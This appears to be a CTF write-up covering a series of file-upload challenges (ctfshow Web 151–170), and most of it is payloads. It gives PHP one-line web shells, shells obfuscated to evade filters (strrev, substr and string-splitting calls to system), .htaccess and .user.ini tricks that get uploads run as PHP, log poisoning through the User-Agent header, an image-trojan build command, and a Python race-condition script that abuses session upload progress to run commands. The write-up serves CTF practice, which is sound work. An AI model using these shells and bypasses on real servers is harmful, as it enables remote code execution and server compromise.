table of Contents
Web 151
Front-end verification, capture and modify data OK
Web 152
Directly upload a sentence of Trojan horse, just connect
Web 153
Reference link:
File upload vulnerability-application of .htaccess and .user.ini configuration files
Because this environment is built by nginx, .htaccess cannot be used.
Web 154
The content of the file cannot have php, it can be bypassed by double writing.
Web 155
Use php short tags: php short tags
Web 156
[ ]
To be filtered, use { }
to replace.
<? eval($_POST{
ctfshow});?>
Web 157
Filtered in the previous basis ;
and {}
.
Combine command execution to construct a picture Trojan horse:
<?=(system('nl ../f*.p*'))?>
Just check the source code of the page.
Web 158
Same as the previous level, you can try different codes in combination with command execution.
Web 159
Maybe some command execution functions have been filtered, just use the `` package:
<?=`nl ../f*.p*`?>
Web 160
Write the next question as you do it.
Upload first.user.ini:
and then upload ctf.png. The Trojan has a try. Try to use the previous method and find that the spaces are filtered. Use some methods to bypass the spaces and report an error:
Since it is file inclusion, try to use log inclusion:
directly include the log file and find that it doesn't work. Check the methods of the masters: I learned what I learned.
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
Then add a sentence of Trojan horse to the User-Agent header, Ant Sword connection:
Web 161
These questions are a headache, there is no prompt, I don’t know what the test site is for each question, and the files are uploaded .
Refer to the methods of the masters and reproduce it. . .
This level should judge the uploaded pictures.
1. Add picture header: GIF89a
2. Make a picture Trojan:
copy 1.png/b + shell.php/a ctf.png
This method was unsuccessful...
Web 162-163
Competitive relationship contained in the file
Reference: Use session.upload_progress for file inclusion and deserialization penetration
1. Upload the configuration file: But I don't know what to ask, it fails when I bring the file name, so I upload the png directly.
2. Upload png:
Thanks to Master Yu's blog, please refer to the script:
import requests
import threading
session = requests.session()
sess = 'ctfshow'
url1 = "http://ea6568d6-7c9e-4f10-9952-df2c188f01d5.chall.ctf.show/"
url2 = "http://ea6568d6-7c9e-4f10-9952-df2c188f01d5.chall.ctf.show/upload"
data1 = {
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'
}
file = {
'file': 'ctfshow'
}
cookies = {
'PHPSESSID': sess
}
def write():
while True:
session.post(url1, data=data1, files=file, cookies=cookies)
def read():
while True:
r = session.get(url2)
if 'flag' in r.text:
print(r.text)
threads = [threading.Thread(target=write),
threading.Thread(target=read)]
for t in threads:
t.start()
Web 164
Secondary rendering in png format, not very good...
Reference link: Secondary rendering
Web 165
jpg picture secondary rendering. GG
Web 166
Refer to the blog of the masters, you can only upload a zip, then upload the zip:
1. Upload the zip file, including a Trojan horse:
2. Access the zip file address:
modify it to POST type, pass parameters, then... report an error and end.
Web 167
Extraordinarily conspicuous title. . .
Upload the .htaccess file:
SetHandler application/x-httpd-php
Upload a jpg format file, write a word of Trojan horse, getshell
Web 168-170
The title description is “Free Kill”, I don’t know much about these, please refer to Master Yu’s blog:
<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>
<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>
<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>
<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>
But I don’t know how to use it...